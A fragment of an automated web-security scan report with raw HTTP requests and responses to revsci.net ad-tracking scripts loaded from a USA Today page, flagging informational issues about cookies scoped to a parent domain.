HQN2w3i7zZxx9jglR+zktHHdI+AaME6nwVOuSWRSMmbBOJQiBGVEKcZZtrixm6A0EkvkXGQhi1mkiDJt28P6lC1YPWnqEjsa1VFxuyj6OhVtpRJH+e2y6R4/cnzJ+CfcLnbecp3jLkBN3A9WKkj160OlWZ6bQrrtnaiNyLK+hjDarrW1/e7DkcyYpLMH7VZ0PoS679JljmXMuDgV63vGcd/l2Xeq07wDl5+804DPNFxxXEWxZK2JxenUyorOZ05lAucMiUYnwDH43x2r3zq4+jzvmUOijuNnDDQC6c2U37Xp4k3g6we4z0Ry3aft2vhGeNZfdQa6KWZJbHpsiIPOCcIXMd7rRsTytymDxbBcSdJSOF12B9Pjw5Zd4nETw83mqHLJNXb+avDtVTPJTZvtMw/WF863sU5PyifACD+WfVm7plRes9cpmKCPcJQ7KvRISbVPTZwwZPbZ+ibDRrmqQ75C3n12yoLgcMTFwwpUXIE8ayLlistW77NupnYkEPzdtEpAoN9Gh3vRGfHy0oQz19wzUQqJlA28pDJ1tX/7iOBCPg6ZY5H+poLDVjrVtXfWnmVV69M+2ceRBwsL9kP8Sh4kd0vsFLne73RkEScWjpHV7/ppEg88FcDKahaMhEZyiRDsKA570XuyQw+UqP5VTXr4GySHBYP6zLT3+/tCziDDi6NClG6rdihdMlrm4QYe4xpq3GPbtAWr82gHnL3YXN2W2EYYdhilT+MNpndsp7h20igjE/HbpSLspAok9tNFXqbEYlOwELgS+lv9Ifkr2X+d0pgrqiQQ0d9l6fgzE+vTxRX/lSqhrDbZ8AP5hPvWP8yU2CWGjyJOp+IQMzxLbCeyMUCOswZyF9Szp3O3Ji1sOZtE3XxCc0gQdRJoaas/cK6jDrj+Zn0IMRafowVEGLGJ68i+1GuK1MUVVnvoLFt0mEIVuYfpXQ0Ox3EP6fd4MwQt7ZSlCzlXGh+Uyu5r2kFhlZQi9L/2q/8uNAomOxLyyaFNZVc6DYQZk9rPmOUl/1BLQsf1hbETMCwzqBObuJhhJm/LMoMBrGq/Uo14rgZ/IiEUZxD2wQsnkg4zyIS9BU59fSAJXFKHCXXf9N00ud61sG4DWv4Y9jKKolUZ0s/uTUq3gugjF+d

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP140OheXIQT7uItGF29/wo/tk8g4QbtKcNWkMCr9n5v3YWnhFMqxnmqlK+Gc3/wmfzpefVKVOPRwvg9X9qS4Xlt5lFeEjyrCtjorBQnqW8IT3pQ3MAZe2lCyw1VgQ19l0SDSzamrGgdEnTehCE73GO6SfeEvGfB/ePW28Rjc+UaUKTzAr3qiT/E/A9iRiZlc09NzQfZT+Q9Ymr70uPTN8A4+lXcq6fLkpp85x9BYjIPzyVRaIMfvXcE7GhMcxwg/lm9SHxHYKFHBYQ2o5m7r63leZFfgV7CmDuCwwp/0YqFBRUgbIgHNZwxcHHEMwRoWPDkmgde/mWBP/120+ym2Fdx+QEjnC4JXCdsw38qknRoGyPcG400b06tFsRd5IpSwRppKnKYKvEdswTOPdlJfOt0N6IkIu4FWZmqnStN/kKDmzr1iwdI+ii1W25IMOZNdZbJa3py9RQjZPceLBAZ1jP/Ati11gEXXmZEKluAM5eBX4NUAsc1YtgTE+NflZ/r4izPl4l/+I1spjfCAZGiGlM171DRo5gEbrE0NS2nc+ggk/G/baDI5/fT26SVty8KokWzLIj9Ye/GtxREtxpNRP0vu5GF1wH; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:21 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39C8JZjpr557JwPKJHPJjVm4nwPAq6ZsbBfuMZB+wNajXjGLCTArLHxzvFq5u+Lwe27lFrnW5WnLzYnzoo2t7qX/KLEKT0mz5bKv0pvHmYlxlCeTJQ7TkZAi9DAPv7SOGmgPMsA//ngmK65gvnHiZEgD1RPhot8Sv09jEec4+rpWoBcU4p12DFf1hQ51Zt4HV8KHA+AfXXn8mwu1/yhYGaCnua8u4HxwGlL9kV3ot398KqTQrWG+ECZ6nLxccn6nffh/n/AGAeAOvVvnhS9Tbd3e25afHbIr8P3Klg0BIZV11qACgR+FitkMBpAaq6bgxupo2pXO2XH0Ly71cTsb8KJPn+UqHcjzeGUImy9VkyAcxejgwxnXEsVoG0TaMXFratkJpKkVirjS5iBPG2/iGxwMqCJS0fddN3FxzsdAEUDsw76c9iUElqZK5wr6Q2bcdyj1o978UjDp5ektzMNfH0cZVPyLFucCKaAsWDcfHJWhOw08TO5Tw7Na4qyEGER+VlahvHG0iTGWfMIeOdDGKDyxij4oKjr/Ol96Eu5IfTJPJdYpTmrWK7qQMkS/YtQL8x/Yv2Nysg0xUuBm6na/qK93wf8Ff4MDPEErMYXJzmmAGd5pAvuQ9Si8pp0pQFoX3Xp+OTxRzMCImdmSj3PtPsUHWdYuQnJDm8IkPgwFKU/gbvv0iXFuCbx9r2GCP7FESzfa8M5nAstxCR9GSYXoNd8RS5azEOe01zI+qM5qwx6eLy/38GDFU7Eev4DIbAtKPxAb1EhS2Jbp5qgmJDMF/H9CfJ4O6B/yDXT9QWynPv70ELi1cl/39Iqh9P0hENBAahxWJF8UMMPhWxKveVeZUlIufin3Xlbf3kf+5HtiVdERpK+cYDBxWBfhCFJ+ssjgk5bC8qBfQdF+dgOkKC5sCOUfNHr8U/0Y0mBWnaFSJCfC0GokPGHvGfXcWXQA/aN0L2p32OB2EsP/j8CBsieqwkdVmGo4FpVwyzbOC7YzL/Bj1d8Er4rhcMEpNp5RqB7QNZFnv25FgFeJeE8TY2EO/hJhkCOv2MhJMPDPIpGkNJbbZ+iJWaxls0uh2rInrkCm6+0CLHZfOURb3HtTse93ne7LDCUlY3NSeRxrne2NTfxxNjKnBvyFgDGmbHBbzWHPyJMj7Jee4h4TSazw0SeKkJZhTXtRsv+aslm3RvB8nWLYdC4jbRdO47GqW1uX6Tb7TjnFCsAxQ48JBxiUYGEtekoZnQRL3tJuSnSsS8cZD4pTE8vrS+cwnGhv3XOZdcWLwAbqQ+t8Xz+xRVRjB0WUfTiXR2deTz972Lq4Lk+olhAhdwf63yN562SC5wjeiHhgK7PUa1b4akirYdjqU8Oz2D92utPhebTGN05RB5lGjeM4WNU1UxmCqbZvfTJaZtLDPGaVwtQT0b0T7mHf0RdthcaAE5+gaDFQlm4qhMWtQYk5uFpmkvkCNJg7DGdsHTLYBy4GFVd+t3Iif4YotDvuc8Qq7AN0MakaMcaAEN2htJmRB8CCSbuUoyTE=; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:21 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:20 GMT
Content-Length: 593

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs = ['D08734_72087','D08734_72092','D08734_72131','D08734_72639','D08734_72674','D08734_72685','D08734_72132','D08734_72078','D08734_72122'
...[SNIP]...

10.38. http://pix04.revsci.net/J06575/a4/0/0/pcx.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /J06575/a4/0/0/pcx.js?csid=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwPKJxC5gZVtCsylMowZVqFba93uE88QpuDb5ZC9UQMpBwKgJsgsK/5y/VyTHjCWG4SoGRm5dWoFU7PHkVBVRsmPo8ulpSziaGfT5EodlaMm+vF2r3l/c95LrsITXHJ2I1zqJbIwuKe5PN2KgWbN8mNcvi/u7eq2U+HGkHowc+nxezhSslqi3VLe86ut3/CbD7ii3elUpunmujKWIZxPJ9ltUcyTIwhrqdTnfK90aiYPaKzaUqqi1CDohU8VolCkQ/PbXsT0D64lEj1zTEx0fYZK083py+2GEeADpri0HRNaxF300KQuDjQ6yz58+/gEwpcHSlXrUjeL+Q+A2KWMxSaXE3vLUGnK762eDMdGneRi4Z5R/PDaDROL3MikWyJfZq3hJmDPIcsKjZ7WKze1UFa9+VR6Daqv9+IX/j69KWQiiGHN62ZLnTvJDkw/+LGzEdm+xrncZe/MTLl/tzGbC6OZ0xyhOwOxLvpW4OEBvo1vFPZqQ8/4dUIZ9c/tMlDDqcpEk6cZrfGczZNcJ07uJ6oe4iZsjKWewFYiQsK/rbrMrdrfQ/1Su1smIgKxV/Y7oSQzXAjnycWIGfDTAndbGihpi8nFzveXcTFNP5ap414bqma34KoXwzYOq2sc7L4a4qOCmcRiLxjHOc0PPPoNmxhfMWndLuIWTqiOZ4fC0D3IIa7verqW/TDSuCVZ4/orK2q93e17LqkrpOdscw4BbMow6IH7X1OwrXgdjH2/vC9ieEfItiNwQm/uKzk/rnEcVobls6XLls68BM8P9BLC9CTJ6FW1a2w9AOYL2XuoVlnxrjqQPEq4TJtb4mppTU9JrmC9dDEMVwLVNX2aP+Qizf0csOzMy1yU7/fW8h2V1Fh2MeGTjho24iDQqgz4BHQnU7cajGik/56FuARVHL/klg+jUrgSyRsWErWs4tagMBICsdSAiN4tHzJKNsWD1RNYyM2mz7OtgN34QjNO13raQh9KK+UWgc5rtxG0dJuMCoIB4X/hheL8GjEwr+reg/R3m7iuStF0nM5KEJf8qN3Jd3KNrW29NASW0ZNG8TRP3WpdNC1EXEgHYHAjK5b8qNIxRpUqD7btnu/7mzW1a5L/HqPfjtu2qmBWPXPU0k8BdOhAlQGKzABVcTeH7d4Na8CZMdKgNzi52xXhAHqzGYP6Jv3XrXlkJmmp8JzGb+Gmv13RIc2KjMZHqcXB+aXLsPdbwjNmb9lJ2+oUGpQZgH12jfK8uKuHOnVxIzQbugywkDX47CIxRV5y+bCwKY89nBay4+AXw/XyremaQ19e7j9A65Xeqz8nK6eezLWs2STWqnAYxnLskLHMzo52qf22tCqcGXq7CGYNR5tfPHBaQhbi8L0bj1ToQM3w0EEhFavgGW8SLtdUODbZFMwPPZ9LSkHDkpM0wf0Hxef3U9E+m2XvWGHg3cU92f5el+wGICUvGb+KsKCaxvvG7KIz2Thse+5WRvmy6IkCYwqk9KHBsTqashxrqRTPDf+cLSf8Y3dw=; rsiPus_GcbX="MLsXrqEO5ihr4JB0esFCP3iNF+pqmr69ENWrChMuiN+dmZss5tWSaGYzfZrs4FkB8vHaExBOdq4FjNOXBUu39W/3K2EuxA2rLiiq5uEzbhBp2qqHLka+ldHHpySEQN7Ig6ZX2s1Xts6k3/V+F1BVNaX7P2AMt0j6s7SVkIqtY6fBmuqDg3HiDPDRsFu8LYGpdAgFuZrn7788WLSfiPN4FcsWpCManqMes4eDphzgluz0J7T/7NL09GWQZKgq0h2UqnrAalLP4GpQ2z6NoJmqhjf8ll+bI1mb+2NJpMp3lsbhQW6smYNRkIcBnGSsjC6V8lHV22qN0wsd7pUjrGcn2MZyDk4pHLi3HPlqzfwOFLKkUZX5pylobtQ4XT7CPkVynIhqs2Jdqx6Qbv+DVlcJEcLKaGs26CcQXDhIjPrjQmHNTw104A6YB2yPj9aadbsR9G2g+Sx1IMWC03cSleVUYqmsonOsNwBq4IYZ0iEAxN1kj79GMm/TFvViob6tBGl9piggG1ojpl++EI4CZ/DO72bnJ5uiK6A+hD9jowvMcmzWV7pm2A+BZXOctz9mBcFlA1NhVrVlT54nZulBkGghmR6LfWnx7wRhTDuJYLIL9CjgkLULZ5OwAnDvGtd8c9/IcoSF7rvvCCwxXrXbNkbJA5UJXZiQQ32aGD42CB8j4Uuicv5NhrCu90msLuL0yXPFEkF+ghJXl4UoCPpQReyKPwLxU7P8scUESOUmDQbJ26zmYoM5EYK5HRM13xlFLDjmN3gr3gzLy3PBXRfK/0inM3mgODaJYIQsP4tG3dxQXtc5BzlJZExi106qBh3X8ZgtVrG+Lsw/MFccxeVYnXDkPkatfVNHemuSBEnlJdlwJ7HaraMYTm4mdXxBXuNRVT1qtXz/N4fX76mCnHZapZ8HwTns8rRrVf85AMpSS1M+G68+RoH70ohcdXqH83XdOwulC23J/LnyGSVNe7uFY075AoD/k5/OVIoNr6nsjen9TP6PMT4mikP8tgoCsDB1P2MYAQIhWsgnQghE6D5W6j3EAllSXGbQxYfklk9PQ5HF/mqinW6N2HQc"; rsi_us_1000000="pUMVIzlHMAYY1A3HkAz1jyt3tlSj9WvRyFxc7CYdMac7y9zNu2VAbbuAi9eNwCUC8Wl4wOOguOEurHKK5ymr+WMVxLrjQRwI/BIpxOPADBg2yufgfgLgTu5j4fLTEQPVeuiSCftktrpjidSb3tKRT16/qhDddfs4YO14yGwo3mknI3Zsage7Hp/us89s/r8sHOwuTFP/CGJvF0CBpAcFUrFpcSeddZugAt2/rJIEsl5lFIWoWu0NxYgUpdu1epUcSWwK6nXWutDM3kjbS6MwxlDUEHsfiC/tX/ajBDdyf6FoclGT9hYvZ6yHELxTGV52+gM/KNJ7HFfCnqBSHyO9h6K2IG72DZG1gnriBn20N4unmsPk3dyDXHODxND8UIYEdTEJhqUeX0XH8ufbk9oKEcwKphMNOSzMjsdEazx5OG/X/voubSxcMfLggv+AZDDDoXbGHiM/jsG6UCatRfU6qwA/nFJ2HLM4H6Vwy6n5QW6iEtTBjhACVrgjSJ1n0sxNueMqqowm9U9MjFONHQUR6SKVk9owlMGLCJ812+Zr34276nVTgfXxsLZ0YiftaKJuIZ0xP8YY9WkMkt9n8RFkDTls6k1BC7v58lSYgZALXT+bKUXFsuSpAsJNWsLmyWs+XDUQmVb0hR/fcPrwgVJhI4ZuwOsX3RWEdg83luatgZ5+TKYM1It/I+VexFONR38x4qDP9iS3Y7dK1r0pZRdkAEwT968QaKX4dePJx+FsOolAvtn/m15h6VbBjCGtzXDFJsq0asZ+2cixyyycOZ0q9ZO0pv1gaqV+NlgOEwszeFk1G7zGPKs7Hn4CRU8RwJ3PC192d/zQh845eP57+B+obaWwyCioHG3FOYiiZ8MJGnrYDWOTh6FFkJ/lnooujf2FtYlU9jKpfaACfJAKJrmg0lUhzCxs3khsT9cbaSuhk/AIXUky6y/7/4/TdCE/G9rDhkcJMYJhTogOtss3qAESQMf2AR/2GXUB9mpl5kBSpRkjsPnWAmqvOIHRkFGc7ucL8rPj3ymJwl+PX2ItsAHmMq2EnmNyakB+vuFAuT9h5l25oI1IwUVAVoafxDxIVvNI3J0B6g0A1HzsmnY5z077NnItIJh3xRNWe/iXIU+CrYWmkPOTjLSuO4lfoF4riXFUJbckXujjUDMTlq5PEpGKQnlA56Zfg9qW912fdgXl6AA2hOYwMsuwUbGDBMFhQ6XfL09iRogg1WfYzxZ2Np6PvGSDERHaUwP8t0euXTq2Q3eSJ4ppXnS6iCAnGFPbCsrGjyRLOmYtFL2Im/UUecMgAjO9mIZcYqqjLobxUzRXN7iqDqCwIOmEyWQ0dYPcKR9laCXq+0nRJKCUAJQnStj+/JYwWMQHmQKF2Ca/hmc4+baAz6xM2NKxfNlISgW/KhdUaqQ38MUa0a1KSbc9v0K8egn0NfsoKiOYm7vbWfw20dVvNkxG4pyhchNYi+IfuzopLXmexn1k8T0TEIckb31ULLX5aO+Lk6yh9ODYCQQrLrxanBsN1+8zTf3vg5v7l3gwefT81PMYeXwyan8ecHtrQGmGtzs3pQzd"; rsi_segs_1000000=pUP148mheXIQT7uItGF25jD9QihE8IYbNKetsiW8kgFisncWnhVMqxlWq0ucAHjnyThQpuvVI9kMh8n1FZRZG3xOHqJgzQCOjhUe97Ueo/oV8rFkwdsAM2inFD5dxpd+U+E093xPsrix3+OZNio25HCvnvFhZhWthmBTyPD4RapFCIEu2lOw/IIwYkz+6mxP7SBJDiF24gicYCle3d6HY7QZbkm+odQJLW8+PWrecDnI1ZKZHQzsDKye1ebNlG+F0O7KsVRUWc2lZiRsgG+YnEnhhOgUjCqIi4i4q43MBu7CNjxFeYUhxsnubRYFgIe24n3W85w7P/Po0VHFfykAgOVvK83VaDdZKWD/KIVe8dqKzyeln73lCPFzE9HjxKDwsj/BfiMyOXhh1G8dLTLCbJhGOrlytpc84LHyZP+KVwJJNYdAUHQMimUPLIaj2XtIzdmkiZElC6E3vZ7BWA6vfqDqyz/UN2NTNZCl2XEU5yfs8jUdCq/L6cLps1Tz6jEWB3nM03mUZ7lIOmLJZpYScvQJPNi6Qhp+d6GkBErOgH5qxczpWuDAoetyw48xMGgXARtZi/Z7txvmN3uOVuc5NDiDAySPpWWPnSs=; rtc_8DRJ=MLvn9jM1Jhpr5oaeFy5cQLrcDcgxJTbyaQGzwLZBotunayc2Fw/K4guEx48AnknPEndoby22cGHsdFck1iBn3DUobt55rCByo31GJyETeLJl0qvf6Jn2sxG2z0iT2bbcjJrHe8GBksW4qcll5AeaXjmGUDbRWU08YZg4edF2cBe9DspCxhQ7361ZfEotlSYP+MqBfL/w57DfCdIuJhyfxWDC+F4W0x32WtybJIRC8CLSlbxi3CC7anzdModTvAzrQfv7i4yJ4tfv23hElzRAo45NzalLx0pI92HjAlvLltXQMEeD59j8HSg5zMzrXkbxPGkDuQO8CD5Uy0X440+GhUuEBlTuXncKpo59or+teixmWGkw4h82xTsJxVA32RlmPlxfLd0DPboL+ScpDqJ7EyCMxiPZjPOZSZb/P18d0B6dPfXACkwW2b7JGqZgtJefS8MvIIRVOAWyGKSddY53IBjTDonVRQtAhow+gjBCkr32CoZhiC2o7W53iumA5JAaEKemP4CuriZ3Oh92wceTFssmiHV03P3TnzqwiMvWyGZOLcS0b36BgNTGDP/oHEgI419GHyNYPYePnsZhRU1jkIemN9OP89YbLzetkOaBNGBt72K+i32KTgFnJgkzRmDcwHADuX26Np6HbpwBpsafN0Td8Ege83IpcLfdCWoH/FOES7/sgvItqGMQtpNCesMiY1/hRPOhuADgEqQtp5XbMpu7Sw9desmqxa5M111GnRnmop62u913vIbogl+ZCoarCoWnW2EKAnaKevDI9CtQiAnPFAcM5XjabtRUvhL/d4fIh8imLNMmzGIfpvWHViSKdYGbIHfNIJWraMC4Vahh9asGqff/FFdlJKXDuHnrmiBy7VCK4q0bmyQiOi23Mbp4rMJ7ZFfExGjh0Deg21XrgVEJygAodlMrUFsYh3x+JL6tM82EyxlrjwnPSOPUficZAt2qOvCpWC4d70ONc6DbRXPel2qVWr9R4NR8spx21DQ329eEMe+a453iMV59kioeuCH7mnuTVCY0BzVfb8yQMpXNmGdq8018efv6cy0UrgNLG4Vvjwd577Jg6h+lwSUDxcDbZmAkDmKadjdnDBljgFfsyAsOrNyuDxbJ8TdkZR9gCAtjvsiBzxEVmOrYT6HzTeMLPHrrCPn/1PB0XdhHCeOuIM86Wd1eiYbwPVZOGYoxestkxrwvlBWmqS4zqiJgxGtklz6N9a8yWObB9QeQjynHLDznE3of6mhDRuDmkgGSe0nOe1faUBKdQj7BlaoONO99Gh3ocsQdQ6RyGiPqI42toAtkHfnwxlmtICBtRaKNsHXLNHetdA+4dp7vxXQ5tu/2hEFKF66SpSaQzQl8TB5m7kte9CE3/B32F347rQ4DCFhYj24E4ZyjUYbpe0M+kBzn/QykOyL/w0irDgy6ZQt/u+a1DUBqXRV0/AJO6NnbAxb2eDhLttfyzv258JjuenKMZ5xPt3XAFLN1oSvz6mF7fh50GXHUdoEQgkSBcZ1PS+wIfJy105Aol0wmkUqPh+kfoC4g82jad8JgHmsdZYx5FOIFhoBZb+snjaACRtXREaWla+3A8eufLP7nR7KLQvyYASC7SpnFhReJFBeehSPWU+4l2YWu2IunhD73tvQqrqM7UaWZW5R9IxXZ6BE+hyLrdBoYsxr5qgsF3QHqO2E6n0mUTNwl0lx9cFq7moVZ2JSzSIqGz8wv2TOVDrWCtgahQ4AuqpA7rev3wwCJJWC95V2UKuatoLe7dfcQ+Denb480wEG/t0RgjmDcYpnL90BoFiSV64XacUbSb6smN2yRmAHTsLTLO0QQnvg5vKkgJRJTsJ9hI4mqRmETR1BUZBdR48YLqpyeBqmK4NH5NH2LRq0bdNdk2U0gw4eAFmkAPgZUmniQzEOz; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP140mheQIMpqaIQFMFxKiG7poa4ScLkSUnuXM5yz7k86fOUkLFRqcJo0UUZKyjTigWJmrc/VPLEk/p83UTC90T3xVW/k94jPzDisxc1qUSPzP1W/5KJ+SuMwS186lIWONYUoRtznhaEp8fJVeEpvQWeVG9EvG7g73n2XzRwkEq30oSxzL21IYncRpB7Vmzy3joSHQ5vGM9VU4VSm5AgWsVYxWk3JS7vRpdayxe8TDsXwUSpQFiYy5pS842/aN9SnRxVGCIP95D87/uDRpu0UmJDYX3l0qRP5BY3b4t7BgLyNwnXHSYYudDVaG4QnEftMpZxTRkqG21q+680BEja/OqvslHejmvsRlOZ7JpFrDGgnxG6RmNPV/VUZ6oaI/7+LgCHZeBf4qFPX4suV/IG+j2+HVc2AnkaVTmZFVq4Wg6IGT7OK7aLdjZWKx36WMViO0RustKJ9k1vcurs9Wb0ktanWk37xrgMXs0OrUvcqyW2aBOTiotobvg9souhsJCPREAxZVNBJYFINIzLz4cU0qJiBxRMTc6+Ma17gKr/ko+8MZoonToCEPsCWPrx5uxMv7a7oGedGSkJGMBROtEbj0gzg==; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:14 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:13 GMT
Content-Length: 939

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','J06575_10245','J06575_10396','D08734_72078','J06575_50073','J06575_50240','J06575_50735','J06575_50807','J06575_50822'];
...[SNIP]...

10.39. http://pix04.revsci.net/J06575/b3/0/3/1003161/235941171.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1003161/235941171.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1003161/235941171.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP140+huHIQDruItGF29/z0a0qdLOaaQnczyWBW6QQ4O3XYuv0liDtqNncA2iFgLyKdDKURNw+S7oQxbOYTHYrKZ2dbvcV56gmyoyU4a2CMf5ovXdEZFcE017Ryqk+7nNFKUlIhPaZaEjzyv5uobKDuejN4W8yhWG/DFPY+M9w2cuecXe9PcpFr0MiJx9yLdq6TTyhSv6PuviC0MN4iKZDkVHzeHcIGMiXdci2bVc4S1cz+9VDmjLExI7RS7MGqqNuya1ss6T2bFacwQP85FS+V6wTdARcJAef2gmv/VTj3x5h4uUd2KuNYX6aHXuiT3h3m8CKB/0AOk9wWBNVPUfegcRyuqIopqk6aDacDhIWbYpka4KxJ5Au6n749iv1R7xCtAEW1joHLhacGq2erlzGy658wn63U+JplcyWh3kMaEJqXxWY+ROvlqSuqXjsCC0qjB/NDXEwTNTA9ZnxJBAIC2mnOSncbDfyTxRILJj3BJHbs5qr7TOO/HZNWacPaSHHs92dfHkKBwBMygq1CPNLMNqgAn9aHt0Xd5asOlVgQ+wMvZGsvN+IiS/oMSjLfugorj+hpz4sT/aI=; 